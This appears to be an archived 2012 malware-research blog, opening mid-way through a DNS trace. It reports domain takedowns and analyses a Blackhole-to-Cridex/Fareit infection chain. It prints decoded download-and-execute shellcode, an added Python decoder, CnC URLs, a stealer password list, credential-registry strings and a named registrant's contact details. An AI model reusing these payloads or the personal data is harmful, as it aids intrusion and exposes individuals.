 |     |\___ ns3.newrect.com [cucaklif.ru] (14.98.225.76) Got authoritative answer
 |      \___ ns2.newrect.com [cucaklif.ru] (1.169.82.215) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns3.newrect.com [cucaklif.ru] (159.224.247.96) * Got authoritative answer
 |     |\___ ns4.newrect.com [cucaklif.ru] (95.68.85.182) Got authoritative answer
 |     |\___ ns6.newrect.com [cucaklif.ru] (176.36.82.206) Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (136.169.52.175) Got authoritative answer
 |     |\___ ns2.newrect.com [cucaklif.ru] (115.252.8.87) Got authoritative answer
 |      \___ ns1.newrect.com [cucaklif.ru] (87.110.84.205) Got authoritative answer
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns1.newrect.com [cucaklif.ru] (86.125.192.34) * * Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (79.115.4.61) Got authoritative answer
 |     |\___ ns3.newrect.com [cucaklif.ru] (60.196.154.12) Got authoritative answer
 |     |\___ ns4.newrect.com [cucaklif.ru] (124.43.156.174) Got authoritative answer
 |     |\___ ns6.newrect.com [cucaklif.ru] (66.63.125.247) Got authoritative answer
 |      \___ ns2.newrect.com [cucaklif.ru] (37.123.3.213) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns2.newrect.com [cucaklif.ru] (46.98.30.104) Got authoritative answer
 |     |\___ ns6.newrect.com [cucaklif.ru] (218.37.77.170) Got authoritative answer
 |     |\___ ns1.newrect.com [cucaklif.ru] (114.26.132.112) * * *
 |     |\___ ns4.newrect.com [cucaklif.ru] (223.179.247.64) Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (37.235.181.207) Got authoritative answer
 |      \___ ns3.newrect.com [cucaklif.ru] (111.119.184.27) * * *
  \___ a.dns.ripn.net [ru] (193.232.128.6)
       |\___ ns5.newrect.com [cucaklif.ru] (91.196.45.235) Got authoritative answer
       |\___ ns3.newrect.com [cucaklif.ru] (195.254.182.197) Got authoritative answer
       |\___ ns1.newrect.com [cucaklif.ru] (93.78.154.181) Got authoritative answer
       |\___ ns4.newrect.com [cucaklif.ru] (50.150.25.163) Got authoritative answer
       |\___ ns2.newrect.com [cucaklif.ru] (213.200.53.16) * * *
        \___ ns6.newrect.com [cucaklif.ru] (89.41.42.216) Got authoritative answer

Tracing to worgukiw.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns3.newrect.com [worgukiw.ru] (188.190.5.185) Got authoritative answer
 |     |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) Got authoritative answer
 |     |\___ ns6.newrect.com [worgukiw.ru] (86.100.10.121) Got authoritative answer
 |     |\___ ns1.newrect.com [worgukiw.ru] (78.97.37.167) Got authoritative answer
 |     |\___ ns2.newrect.com [worgukiw.ru] (93.116.113.161) Got authoritative answer
 |      \___ ns5.newrect.com [worgukiw.ru] (111.88.6.136) *
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns4.newrect.com [worgukiw.ru] (46.250.124.196) Got authoritative answer
 |     |\___ ns2.newrect.com [worgukiw.ru] (87.110.88.204) Got authoritative answer

#MalwareMustDie - Happy New Year to friends & crusaders!

Thursday, December 27, 2012

Announce of Multiple Malware Domains Deactivation Progress - The "Operation Tango Down"

To all friends in the malware-fighting community and to all supporters and readers of our MalwareMustDie blog: we have good news. Our fight against malware leaps into the next, brighter stage. The malware cases posted on MalwareMustDie were not only analyzed, decoded and exposed from their infector layers down to their CnC; through the persistent dedication of our members we also reported each case to the relevant authorities and established a good collaboration with them for the deactivation of malware domains and the related CnC and infector hosts.

The established cooperation has produced good results. From now on we are releasing a regular series of posts on the malware domain deactivation results for the cases we investigate and follow. Each report will contain the list of blocked/suspended domain names, IPs, malicious DNS servers, the bad actors' registration IDs, etc.

We call this operation "Tango Down"; it is managed by several project leaders. Here is the first official post of this series of reports.

In this report we'd like to announce two achievements we made during Christmas. The report will be continued in a second part with further details on the currently ongoing "Tango Down" process.

Here are the details:

1. Deactivation of severe .RU malware infector domains

Based on the analysis posted at the links below (click the numbers to see details):
[1] Analysis of Fake Facebook Notification redirect to BHEK & infecting Cridex Malware
[2] Spam "You have been sent a file" + WordPress Redirector ...
[3] Fake Facebook Notification Leads to Cridex/PasswordStealer
[4] "More" Spam to BHEK to Cridex; How they define, grab & send the credentials
[5] Getting more "Personal" & Deeper into Cridex...
[6] The Crime Still Goes On: Trojan Fareit Credential Stealer
We really appreciate the wonderful cooperation received from CERT-GIB (the Computer Security Incident Response Team of Group-IB). The effort resulted in the successful deactivation of the 32 infector domains listed below, which were verified and proved to be related to the Blackhole Exploit Kit crime users who infect victims with the Cridex Trojan, which in turn drops the Trojan Fareit credential stealer:
Following the above achievement, we again thank CERT-GIB for the wonderful collaboration, together with our front member @it4sec, on the other cases posted below (click the number for details):
[1] On Daily Basis: DNS switch as anti-forensics feature in Malware
[2] VT Comment: FakeAV's (SUPERAntiSpyware.com) trojan downloader 
After being analyzed and proved to be malware with pseudo-random domain (DGA) callbacks to motherships, amounting to a total of 92 .RU domains, the domains listed below were also successfully suspended; I have just confirmed their deactivation:
These achievements were made through good collaboration between good guys and good communication with people who share the same strong will to clean up our beloved internet from malware, and they ended in a good result. We thank CERT-GIB very much for their tireless and wonderful work, and @it4sec, his team and all the MalwareMustDie members involved in making this project run and succeed.

The collaboration continues on a bigger set of targets in the near future. We will post the next results in the next post of this series.

2. The shutdown of Malware Domains served by Malicious DNS

As previously announced on Twitter, we exposed the other result of the "Tango Down" operation, which targeted multiple infection schemes of multiple malware families and exploit kits (mostly Blackhole Exploit Kits), and which is led by a different member (@essachin).

The deactivation of the malware domains could be done through collaboration with the domain registrar responsible for the DNS service used for the malicious activity. Previously we announced that 140+ domains were suspended,

..but it looks like another NEW 120 domains will be added to the list shortly.
The current project leader will post the analysis details on his blog; I will add its link here.
The latest result of this project is maintained here--->>[PASTEBIN]

(to be continued)

#MalwareMustDie!

Saturday, December 22, 2012

The Crime Still Goes On: Trojan Fareit Credential Stealer - New Server, Same Group, Same Game (via BHEK/Cridex)

As posted A WEEK AGO here -->>[Prev.Post], that crime group STILL infects victims.
The infector concept and the binary behaviour are exactly the same as before.

Infection Source Summary & Trojan Communication Info

Spam infector:
URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
Server: Apache, WordPress
IP: 50.116.98.44
Blackhole:
Landing: h00p://latticesoft.net/detects/continues-little.php
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
X-Powered-By: PHP/5.3.14
IP: 59.57.247.185
Trojan Cridex (payload) download url:
h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d
Trojan Fareit Download Source:
*) All proxies: port 8080, server nginx/1.0.10
A PoC of the Trojan Fareit stealer download is shown in the example below:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 94.73.129.120:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
...?f/.....0N}a.9.Je...U;0..
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 22 Dec 2012 08:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Trojan Fareit callback IPs:
CnC is 62.76.177.51, PoC:
// Credentials sent to the CnC panel
var adminPanelLocation = 
'h00p://62.76.177.51/if_Career/';

//Data Modify Process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8

// Phishing Credentials urls
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
CnC passwords (reversed from Trojan Fareit):
phpbb      john316      pass        slayer     
qwerty     richard      aaaaaa      wisdom     
jesus      blink182     amanda      praise     
abc123     peaches      nothing     zxcvbnm    
letmein    cool         ginger      samuel     
test       flower       mother      mike       
love       scooter      snoopy      dallas     
password1  banana       jessica     green      
hello      james        welcome     testtest   
monkey     asdfasdf     pokemon     maverick   
dragon     victory      iloveyou1   onelove    
trustno1   london       mustang     david      
iloveyou   123qwe       helpme      mylove     
shadow     startrek     justin      church     
christ     george       jasmine     friend     
sunshine   winner       orange      god        
master     maggie       testing     destiny    
computer   trinity      apple       none       
princess   online       michelle    microsoft  
tigger     123abc       peace       bubbles    
football   chicken      secret      cocacola   
angel      junior       grace       jordan23   
jesus1     chris        william     ilovegod   
whatever   passw0rd     iloveyou2   football1  
freedom    austin       nicole      loving     
killer     sparky       muffin      nathan     
asdf       admin        gateway     emmanuel   
soccer     merlin       fuckyou1    scooby     
superman   google       asshole     fuckoff    
michael    friends      hahaha      sammy      
cheese     hope         poop        maxwell    
internet   shalom       blessing    jason      
joshua     nintendo     blahblah    john       
fuckyou    looking      myspace1    1q2w3e4r   
blessed    harley       matthew     baby       
baseball   smokey       canada      red123     
starwars   joseph       silver      blabla     
purple     lucky        robert      prince     
jordan     digital      forever     qwert      
faith      thunder      asdfgh      chelsea    
summer     spirit       rachel      angel1     
ashley     bandit       rainbow     hardcore   
buster     enter        guitar      dexter     
heaven     anthony      peanut      saved      
pepper     corvette     batman      hallo      
hunter     hockey       cookie      jasper     
lovely     power        bailey      danielle   
andrew     benjamin     soccer1     kitten     
thomas     iloveyou!    mickey      cassie     
angels     1q2w3e       biteme      stella     
charlie    viper        hello1      prayer     
daniel     genesis      eminem      hotdog     
jennifer   knight       dakota      windows    
single     qwerty1      samantha    mustdie    
hannah     creative     compaq      gates      
qazwsx     foobar       diamond     billgates  
happy      adidas       taylor      ghbdtn     
matrix     rotimi       forum       gfhjkm   hgTYDOMium

Analysis Summary & Research Materials

This time I dumped every memory region of Trojan Fareit into a text file here-->>[PASTEBIN], so you can see which FTP, file and POP/SMTP credential data is leaked & grabbed, as evidence of this evil stealer crime.
Additionally, see the Fareit Trojan's config here -->>[PASTEBIN]; you can confirm the targeted online banks and the phishing HTML code these actors used.
There are slight BHEK changes in the PluginDetect obfuscated code (landing page); I cracked it manually and wrote GUIDANCE to decode it here -->>[PASTEBIN]. PluginDetect before -->>[PASTEBIN] & after decoding -->>[PASTEBIN]
Payload binary static & dynamic analysis text (a quick one) -->>[PASTEBIN]
Sample download is here -->>[MEDIAFIRE]
Captured data is here (PCAP, RegShot, MEMShot, etc.) -->>[MEDIAFIRE]

Account Phishing Act by current version Trojan

Hello Citi Account Online! Same as previous: Chase Bank! This time BANK OF AMERICA!!!

PoC of all possible Email Credentials Also Grabbed

In the previous case, I had a strong request to check not only HTTP/FTP/server logins but also e-mail credentials. Here we go:
POP3_Password2
SMTP_Password2
IMAP_Password2
HTTPMail_Password2
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Software\RimArts\B2\Settings
DataDir
DataDirBak
Mailbox.ini
Software\Poco Systems Inc
Path
\PocoSystem.ini
Program
DataPath
accounts.ini
\Pocomail
Software\IncrediMail
EmailAddress
Technology
PopServer
PopPort
PopAccount
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
\BatMail
\The Bat!
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
Working Directory
ProgramDir
Count
Default
Dir #%d
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
Outlook
\Accounts
identification
identitymgr
inetcomm server passwords
outlook account manager passwords identities

Virus Total Detection Ratio

Landing Page: (3/45) ---->>[VirusTotal]
Trojan Cridex Downloader: (15/44) ---->>[VirusTotal]
Trojan Fareit Credential Stealer: (4/45) ---->>[VirusTotal]

PoC / Analysis ScreenShots

Malware processes:
Payload after self-copying (dropping) into %AppData%\
Network HTTP traffic captured:
Need to fix the binary before reversing it properly...
// Very annoying anti-reverse....
   :         :                           :
0x00003cf2 (01) 47                     INC EDI
0x00003cf3 (01) 5c                     POP ESP
0x00003cf4 (05) a9 2835b437            TEST EAX, 0x37b43528
0x00003cf9 (03) 0ff2f8                 PSLLD MM7, MM0
0x00003cfc (01) 4b                     DEC EBX
0x00003cfd (01) 95                     XCHG EBP, EAX
0x00003cfe (02) b2 f9                  MOV DL, 0xf9
0x00003d00 (01) ef                     OUT DX, EAX
0x00003d01 (01) 51                     PUSH ECX
0x00003d02 (01) ac                     LODSB
0x00003d03 (01) 46                     INC ESI
0x00003d04 (02) 71 77                  JNO 0x00003d7d   ; 1
0x00003d04 --------------------------------------------------
0x00003d06 (02) 72 71                  JB 0x00003d79    ; 2
0x00003d06 --------------------------------------------------
0x00003d08 (02) 77 72                  JA 0x00003d7c    ; 3
0x00003d08 --------------------------------------------------
0x00003d0a (02) 71 77                  JNO 0x00003d83   ; 4
0x00003d0a --------------------------------------------------
0x00003d0c (02) 72 71                  JB 0x00003d7f    ; 5
  :          :    :                     :    :     :
3CE8   50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4    PDD3.$..b'G..(5.
3CF8   37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71    7...K....Q.Fqwrq
3D08   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw // This qwrqwr :-(((
3D18   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D28   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
3D38   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw
3D48   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D58   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
  :                             :                            :

PoC of the same group as previous case

Seriously, it uses the same NS server, registered by the same person..
// latticesoft.net < DNS search

;; QUESTION SECTION:
;latticesoft.net.               IN      ANY

;; ANSWER SECTION:
latticesoft.net.        900     IN      A       59.57.247.185
latticesoft.net.        900     IN      SOA     ns1.amishshoppe.net. . 1356192301 60 120 1048576 900
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; AUTHORITY SECTION:
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; ADDITIONAL SECTION:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

// PoC that the infector domain is currently in service:

//Historical/pDNS related IP-Domain Info:
eaglepointecondo.org  A  59.57.247.185
latticesoft.net       A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl A  59.57.247.185

// Check AXFR (see whether anyone can change records via a secondary DNS)
]$ nslookup
> set type=axfr
> amishshoppe.net
; Transfer failed.
Server:         8.8.8.8
Address:        8.8.8.8#53

// WHOIS Database of DNS Service Domain....

Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013

// Registrant Database Checks...
Registrant:

   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: amishshoppe.net
   Created on..............: 2012-11-15
   Expires on..............: 2013-11-15

Administrative Contact:
   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Technical  Contact:
   Registercom
   Domain Registrar
   12808 Gran Bay Pkwy
   West Jacksonville, FL 32258
   US
   Phone: +1.9027492701
   Email: domainregistrar@register.com

DNS Servers:
   ns2.amishshoppe.net
   ns1.amishshoppe.net

#MalwareMustDie

Sunday, December 16, 2012

Getting more "Personal" & Deeper into Cridex joint with Fareit Credential Stealer Infection

I posted these findings scattered across Twitter, VirusTotal and KernelMode (thanks
to @Xylit0l for the invitation), so it is time to put them together..
And I'm advising you that making documentation is 1,000 times more important;
it sucks and is time consuming, yet it is a perfect strategy to fight these moronz.

Starting from a spam that leads to a redirector page, which leads us to the Blackhole (v2.01) landing page; below are the sites:

//Redirector: 
h00p://abyssinianflights.com/components/com_ag_google_analytics2/alert-service-citi-sign_in.html
BHEK Landing Page: 
h00p://eaglepointecondo.biz/detects/operation_alert_login.php
Here are the pastes of the above data: Redirector-->>[PASTEBIN], LandingPage-->>[PASTEBIN], PluginDetectBHEK2-->>[PASTEBIN]
The landing page had a 302 protector for bad parameters:
HTTP request sent, awaiting response... 302 Found
Location: h00p://citibank.com [following]
--20:24:05--  h00p://citibank.com/
           => `index.html'
Resolving citibank.com... 192.193.103.222, 192.193.219.58
Connecting to citibank.com|192.193.103.222|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: h00ps://online.citibank.com/US/Welcome.c [following]
h00ps://online.citibank.com/US/Welcome.c: Unsupported scheme.
I went straight to whacking the shellcode, by recoding it into:
var a = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!...(copy-paste those moronz code here friends)..%1414!%".split("").reverse().join("");
x = a["replace"](/\%!/g, "%" + "u");
document.write(x);
This will burp out the shellcode... the result is the bytes below:
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 fe fd 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
    :                          :                       :
4d 4b 5c 5b 07 47 58 4d  5a 49 5c 41 47 46 77 49  MK\[.GXMZI\AGFwI
44 4d 5a 5c 77 44 47 4f  41 46 06 58 40 58 17 47  DMZ\wDGOAF.X@X.G
4e 15 1b 18 12 19 46 12  19 41 12 19 41 12 1b 1b  N.....F..A..A...
0e 51 4d 15 19 45 12 19  4f 12 19 4e 12 19 42 12  .QM..E..O..N..B.
19 45 12 19 43 12 1b 18  12 19 43 12 1b 1b 12 19  .E..C.....C.....
47 0e 4f 15 19 43 0e 40  50 15 44 0e 46 4c 15 58  G.O..C.@P.D.FL.X
28 28                                             ((
Use your shellcode cracker tools or emulator libraries to disassemble it and list the API calls:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
We get the payload download URL below:
h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p
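The two decoding steps above, the reversed "%!" string trick of the landing page and the XOR 0x28 loop visible in the shellcode dump (sub cx,0xfdfe; xor byte [eax],0x28; inc eax; loop), carried out in Python as an added example that is not part of the original post. The fixture is constructed from the hex-dump lines shown above with the elided middle omitted (the page shows only the head and tail of the obfuscated string), and the stub parser reads the key, count and body offset off exactly this stub layout rather than being a general shellcode analyzer.

```python
import re
import struct


# --- Step 1: undo the landing page's string trick ---------------------------
# The page's JavaScript does a.split("").reverse().join("") and then replaces
# every "%!" with "%u", so document.write() receives %uXXXX escapes.
def deobfuscate_js_string(obf: str) -> str:
    return obf[::-1].replace("%!", "%u")


def unescape_to_bytes(escaped: str) -> bytes:
    """Turn %uXXXX escapes into the bytes the browser would hold in memory.

    unescape("%u8366") yields one UTF-16 code unit; in memory that unit is
    little-endian, so %u8366 becomes the bytes 66 83.
    """
    units = re.findall(r"%u([0-9a-fA-F]{4})", escaped)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)


# --- Step 2: emulate the XOR decoder stub the shellcode carries --------------
# Layout taken from the dump above:
#   eb 10             jmp  +0x10        (to the call below)
#   58                pop  eax          (eax = address after the call)
#   31 c9             xor  ecx, ecx
#   66 81 e9 fe fd    sub  cx, 0xfdfe   -> cx = 0x0202 bytes to decode
#   80 30 28          xor  byte [eax], 0x28
#   40                inc  eax
#   e2 fa             loop
#   e8 eb ff ff ff    call back to the pop eax (GetPC trick)
# The encoded body starts right after that call.
STUB_SUB_CX = re.compile(rb"\x66\x81\xe9(..)", re.S)
STUB_XOR_LOOP = re.compile(rb"\x80\x30(.)\x40\xe2\xfa", re.S)
STUB_GETPC_CALL = b"\xe8\xeb\xff\xff\xff"


def parse_decoder_stub(raw: bytes):
    """Return (xor_key, byte_count, body_offset), or None if no such stub."""
    m_sub = STUB_SUB_CX.search(raw)
    m_xor = STUB_XOR_LOOP.search(raw)
    call_at = raw.find(STUB_GETPC_CALL)
    if not (m_sub and m_xor) or call_at < 0:
        return None
    imm16 = struct.unpack("<H", m_sub.group(1))[0]
    count = (-imm16) & 0xFFFF            # 0 - 0xfdfe (mod 2^16) = 0x0202
    key = m_xor.group(1)[0]
    return key, count, call_at + len(STUB_GETPC_CALL)


def xor_decode_body(raw: bytes, key: int, count: int, start: int) -> bytes:
    # The real loop runs exactly `count` times; a truncated capture is clamped
    # so whatever is present still gets decoded.
    end = min(start + count, len(raw))
    body = bytes(b ^ key for b in raw[start:end])
    return raw[:start] + body + raw[end:]


def printable_strings(data: bytes, min_len: int = 8):
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def analyze(obf: str) -> dict:
    raw = unescape_to_bytes(deobfuscate_js_string(obf))
    stub = parse_decoder_stub(raw)
    decoded = raw if stub is None else xor_decode_body(raw, *stub)
    return {"raw": raw, "stub": stub, "decoded": decoded,
            "strings": printable_strings(decoded)}


# --- Constructed fixture -----------------------------------------------------
# Inverse of steps 1+2a, used only to rebuild the obfuscated string from the
# page's hex-dump lines (the real string is elided with "..." on the page).
def obfuscate_bytes(raw: bytes) -> str:
    assert len(raw) % 2 == 0, "%u escapes carry 16-bit units"
    esc = "".join("%%u%04x" % struct.unpack("<H", raw[i:i + 2])[0]
                  for i in range(0, len(raw), 2))
    return esc.replace("%u", "%!")[::-1]


PAGE_HEAD = bytes.fromhex(          # first three dump lines: stub + start of body
    "41414141 6683e4fc fceb1058 31c96681"
    "e9fefd80 302840e2 faeb05e8 ebffffff"
    "adcc5d1c c1771be8 4ca36818 a36824a3"
)
PAGE_TAIL = bytes.fromhex(          # last dump lines: encoded URL + terminator
    "4d4b5c5b 0747584d 5a495c41 47467749"
    "444d5a5c 7744474f 41460658 40581747"
    "4e151b18 12194612 19411219 41121b1b"
    "0e514d15 19451219 4f12194e 12194212"
    "19451219 43121b18 12194312 1b1b1219"
    "470e4f15 19430e40 5015440e 464c1558"
    "2828"
)
OBFUSCATED_SAMPLE = obfuscate_bytes(PAGE_HEAD + PAGE_TAIL)

if __name__ == "__main__":
    result = analyze(OBFUSCATED_SAMPLE)
    print("stub (key, count, body offset):", result["stub"])
    for s in result["strings"]:
        print("string:", s)
```

The recovered string ends in the same `...&g=1k&hx=l&nd=p` query that the emulator trace shows in URLDownloadToFileA, and the trailing `28 28` of the dump decode to the two NUL bytes terminating it.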
I like to see what the BHEK server side replied during the download:
//my header
GET /detects/operation_alert_login.php?of=30:1n:1i:1i:33&%20ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p HTTP/1.1
Referer: h00p://eaglepointecondo.biz/detects/operation_alert_login.php
User-Agent: MalwareMustDie painted logo in your EK doors
Accept: */*
Host: eaglepointecondo.biz
Connection: Keep-Alive
//replies:
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Dec 2012 11:01:05 GMT
Content-Type: application/x-msdownload
Content-Length: 135168
Connection: close
X-Powered-By: PHP/5.3.14
Pragma: public
Expires: Sat, 15 Dec 2012 11:01:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Here's what the mess looks like:
I was tired, so I tried to check it in some online tools but got no satisfactory result, and VirusTotal seemed to have problems uploading... so I used my last energy to check it myself, as per the video below:
This time I'll leave the binary analysis to you; you can use my previous post as guidance. PS: the binaries are all encrypted; decrypting them will be a good idea! (I will add the binary analysis later on..)
I go straight to the behavior test below, to capture & expose this infection. The Cridex trojan, if executed, behaves like this: the program self-copies/drops itself to:
%AppData% KB000777165.exe //which is actually the same file...
With the copy API below:
CopyFileW(lpExistingFileName: "C:\TEST\info.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", 
bFailIfExists: 0x0)
Here's the proof: a self-execution trace with the API (CMD) below was found:
lpCmdLine=C:\Documents and Settings\User\Application Data\KB00085031.exe, uCmdShow=0
It runs like this:
Interesting strings found in that binary:
At this point we captured the huge binary saved after the HTTP POST was sent:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache

// The reply: long encrypted binary data...
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
   :
   :snip
   :
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
.<p....N....,..v......R...d..U_...?....k...-.....E%.snip
...a.AZ$......H...7r......
And then the below file was found, created in %Temp%:
FileName: exp2.tmp.exe
TimeStamp: 2012/12/15 18:58 122,880  
MD5 ce7474646297ed818bb8ed48f50c7e1e
The file looks like this. And THEN... the new process exp2.tmp.exe started. Up to this point we know that KB00085031.exe downloads exp2.tmp.exe. Currently, only one key was added in the registry, an autostart for KB00085031.exe:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003
\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: 
""C:\Documents and Settings\%%UserName\Application Data\KB00777165.exe""

Network activity

At this point, exp2.tmp.exe was making a hell of a lot of connections; I recorded them in Wireshark as per the summary below, full data is here --->>[PASTEBIN]
(323): try to connect to 132.248.49.112
(335): DNS requests to...
          112.49.248.132.in-addr.arpa web.ecologia.unam.mx
          77.65.130.113.in-addr.arpa  ns.shinbiro.com..domain
(360): Communicating via HTTP/POST to 203.113.98.131:80
